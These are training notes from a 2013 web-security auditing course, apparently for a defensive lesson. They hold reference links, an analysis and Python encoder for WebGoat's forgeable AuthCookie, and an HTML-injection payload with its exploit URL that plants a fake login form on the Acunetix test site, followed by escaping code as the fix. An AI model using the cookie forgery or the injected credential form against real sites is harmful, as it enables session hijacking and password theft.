
Notes

Course: Web Application Security Auditing (distance learning) - Lesson 2 - July 2013

OWASP Broken Web Applications Project
https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project

OWASP WebGoat Project
https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project

OWASP Top 10 2013 - A2 Broken Authentication / Session Management
https://www.owasp.org/index.php/Top_10_2013-A2-Broken_Authentication_and_Session_Management

Session ID
http://searchsoftwarequality.techtarget.com/definition/session-ID

Authentication
http://www.tecmundo.com.br/seguranca/1971-o-que-e-autenticacao-.htm

HTTP Protocol
http://simplesideias.com.br/entendendo-um-pouco-mais-sobre-o-protocolo-http

HTTP Authentication:
http://technet.microsoft.com/pt-br/library/cc441713.aspx
RFC 2617 - HTTP Authentication
http://tools.ietf.org/html/rfc2617

Cert.br Cryptography Primer
http://cartilha.cert.br/criptografia/

PCI DSS
http://imasters.com.br/artigo/12196/seguranca/pci-dss-entenda-como-funciona-a-norma-de-seguranca-de-transacoes-eletronicas/

NIST - National Institute of Standards and Technology
www.nist.gov/

Cryptographic hash and the development of the SHA-3 standard
http://csrc.nist.gov/groups/ST/hash/

MD5 potentially compromises SSL security
http://www.infoq.com/br/news/2009/01/MD5-Unsecure

Key Signing Party
https://en.wikipedia.org/wiki/Key_signing_party

Certificate authority
http://serasa.certificadodigital.com.br/perguntas-frequentes/o-que-e-a-autoridade-certificadora-ac/

Hash
http://www.techtudo.com.br/artigos/noticia/2012/07/o-que-e-hash.html

Clavis Webinar #16 - Brute Force Attacks
http://www.blog.clavis.com.br/webinar-16-ataques-de-forca-bruta-metodo-dicionario-hibridos-e-rainbow-tables/

tamperdata
http://tamperdata.mozdev.org/

LinkedIn, eHarmony and Last.fm password hashes leaked
http://g1.globo.com/platb/seguranca-digital/2012/06/11/entenda-o-vazamento-de-senhas-do-linkedin-do-eharmoney-e-do-last-fm/

What is SSL
http://www.techtudo.com.br/artigos/noticia/2012/01/o-que-e-ssl.html

CAPTCHA
http://www.tecmundo.com.br/curiosidade/2861-o-que-e-captcha-.htm

How social media revolutionized brute force attacks - Presentation by Henrique Soares (Clavis) at FISL 2013
http://www.slideshare.net/clavissecurity/entendendo-como-as-mdias-socias-revolucionaram-os-ataques-de-fora-bruta

Cross Site Scripting (XSS)
http://www.acunetix.com/websitesecurity/xss/

Apache
http://www.apache.org/

Acunetix
http://www.acunetix.com/

Cross User Defacement
https://www.owasp.org/index.php/Cross-User_Defacement

Acunetix vulnerable ASP test page
http://testasp.vulnweb.com/

OWASP Top 10 2013 - A3 Cross Site Scripting
https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)

XSS Prevention Cheat Sheet
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

OWASP Top 10 2013 - A4 Insecure Direct Object References
https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References

OWASP Top 10 2013 - A5 Security Misconfiguration
https://www.owasp.org/index.php/Top_10_2013-A5-Security_Misconfiguration

Web Application Firewall
https://www.owasp.org/index.php/Web_Application_Firewall

Instructor's Codebox
WEBGOAT
Session Management Flaws

User: Webgoat
AuthCookie 65432ubphcfx
JSESSIONID 826AC00353A7F48A1614102B042F02AC

User: Aspect
AuthCookie 65432udfqtb
JSESSIONID 826AC00353A7F48A1614102B042F02AC

Analyzing AuthCookie
65432ubphcfx
65432udfqtb
The word is reversed, then each letter is incremented by 1:
Webgoat -> ubphcfx
aspect -> udfqtb
alice -> ecila -> fdjmb
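The cookie scheme recovered above, worked through in code. This is an added example written for these notes, not code from the course or from WebGoat: it encodes and decodes the AuthCookie exactly as the analysis describes (reverse the name, shift each letter forward by one, keep the fixed prefix 65432 seen in both captured cookies), checks whether a captured cookie decodes to a known account name, and contrasts it with a session token drawn from the OS random generator, which at 32 hex characters has the shape of the JSESSIONID captured above. Wrapping z back to a, the `known_users` argument and all function names are assumptions of the example.

```python
import secrets
import string
from typing import Iterable, Optional

# Constant prefix observed in both captured AuthCookie values in the notes
AUTHCOOKIE_PREFIX = "65432"


def _shift_letter(c: str) -> str:
    """Shift one lowercase letter forward by one place in the alphabet.
    The notes show no 'z'; wrapping z -> a is an assumption of this example."""
    idx = string.ascii_lowercase.index(c)
    return string.ascii_lowercase[(idx + 1) % 26]


def _unshift_letter(c: str) -> str:
    """Inverse of _shift_letter (a -> z under the same wrap assumption)."""
    idx = string.ascii_lowercase.index(c)
    return string.ascii_lowercase[(idx - 1) % 26]


def encode_authcookie(username: str) -> str:
    """Reproduce the scheme recovered in the notes: lowercase the user name,
    reverse it, shift every letter forward by one, prepend the fixed prefix."""
    reversed_name = username.lower()[::-1]
    return AUTHCOOKIE_PREFIX + "".join(_shift_letter(c) for c in reversed_name)


def decode_authcookie(cookie: str) -> Optional[str]:
    """Invert the scheme. Returns None when the cookie does not follow it,
    which is the check an auditor runs to confirm the token is derived
    from the user name rather than from a random source."""
    if not cookie.startswith(AUTHCOOKIE_PREFIX):
        return None
    body = cookie[len(AUTHCOOKIE_PREFIX):]
    if not body or not all(c in string.ascii_lowercase for c in body):
        return None
    return "".join(_unshift_letter(c) for c in body)[::-1]


def is_username_derived(cookie: str, known_users: Iterable[str]) -> bool:
    """True when the cookie decodes to one of the known account names,
    i.e. it carries no secret at all and any user can compute any other
    user's cookie."""
    decoded = decode_authcookie(cookie)
    return decoded is not None and decoded in {u.lower() for u in known_users}


def new_session_token(nbytes: int = 16) -> str:
    """What a session identifier should look like instead: 128 bits from the
    OS CSPRNG, rendered as 32 hex characters."""
    return secrets.token_hex(nbytes)


if __name__ == "__main__":
    for user in ("Webgoat", "aspect", "alice"):
        print(user, "->", encode_authcookie(user))
    print("random token:", new_session_token())
```

The point for the audit report is `is_username_derived`: when it returns True for the captured cookies, the AuthCookie provides no authentication at all, and the finding maps directly to OWASP Top 10 2013 A2.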

Code to use on the Acunetix vulnerable ASP page

Code to put in the search field
<br><br>Entre aqui com suas credenciais:<form
action="destination.asp"><table><tr><td>Nome:</td><td><input type=text length=20
name=nome></td></tr><tr><td>Senha:</td><td><input type=text length=20
name=senha></td></tr></table><input type=submit value=Acessar></form>

URL with the vulnerability exploited
http://testasp.vulnweb.com/search.asp?tfSearch=%3Cbr%3E%3Cbr%3EEntre+aqui+com+suas+credenciais%3A%3Cform+action%3D%22destination.asp%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ENome%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dnome%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3ESenha%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dsenha%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E%3Cinput+type%3Dsubmit+value%3DAcessar%3E%3C%2Fform%3E+
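What the fix for the search field looks like, as an added example that is not the course's code nor Acunetix's: it decodes the tfSearch parameter from the exploited URL above the way the server receives it, renders it into a stand-in results template both verbatim (the vulnerable behaviour) and HTML-encoded as the OWASP XSS Prevention Cheat Sheet requires for data placed in an HTML body, and checks which rendering carries the injected form. `RESULTS_TEMPLATE`, the function names and the `injects_markup` check are assumptions of the example, not the real search.asp.

```python
import html
from urllib.parse import parse_qs, urlsplit

# The exploited URL from the notes, re-joined into a single string
EXPLOITED_URL = (
    "http://testasp.vulnweb.com/search.asp?tfSearch=%3Cbr%3E%3Cbr"
    "%3EEntre+aqui+com+suas+credenciais%3A%3Cform+action%3D%22destination.asp%22%3E"
    "%3Ctable%3E%3Ctr%3E%3Ctd%3ENome%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type"
    "%3Dtext+length%3D20+name%3Dnome%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd"
    "%3ESenha%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name"
    "%3Dsenha%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E%3Cinput+type"
    "%3Dsubmit+value%3DAcessar%3E%3C%2Fform%3E+"
)

# Hypothetical page template standing in for search.asp (constructed here,
# not the real page); {term} marks where the search term is reflected
RESULTS_TEMPLATE = (
    "<html><body><h1>Search results</h1>"
    "<p>You searched for: {term}</p>"
    "</body></html>"
)


def search_term_from_url(url: str) -> str:
    """Decode the tfSearch parameter the way the server sees it:
    percent-decoded, with '+' turned back into spaces."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("tfSearch", [""])[0]


def render_unescaped(term: str) -> str:
    """Reflect the term verbatim. This is the behaviour that lets the injected
    login form appear inside the results page."""
    return RESULTS_TEMPLATE.replace("{term}", term)


def render_escaped(term: str) -> str:
    """Same page, with the term HTML-encoded before it lands in the HTML body
    (OWASP XSS Prevention Cheat Sheet rule #1). The browser now shows the
    payload as text instead of interpreting it as markup."""
    return RESULTS_TEMPLATE.replace("{term}", html.escape(term, quote=True))


def injects_markup(page: str) -> bool:
    """Naive comparison check used by this example only: did the reflected
    term introduce a <form> or <input> element into the page?"""
    body = page.lower()
    return "<form" in body or "<input" in body


if __name__ == "__main__":
    term = search_term_from_url(EXPLOITED_URL)
    print("vulnerable rendering injects a form:", injects_markup(render_unescaped(term)))
    print("escaped rendering injects a form:  ", injects_markup(render_escaped(term)))
```

Encoding on output is the control that holds regardless of what the search box accepts; the encoded form of `<form action="destination.asp">` becomes `&lt;form action=&quot;destination.asp&quot;&gt;`, which the browser renders as literal text.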
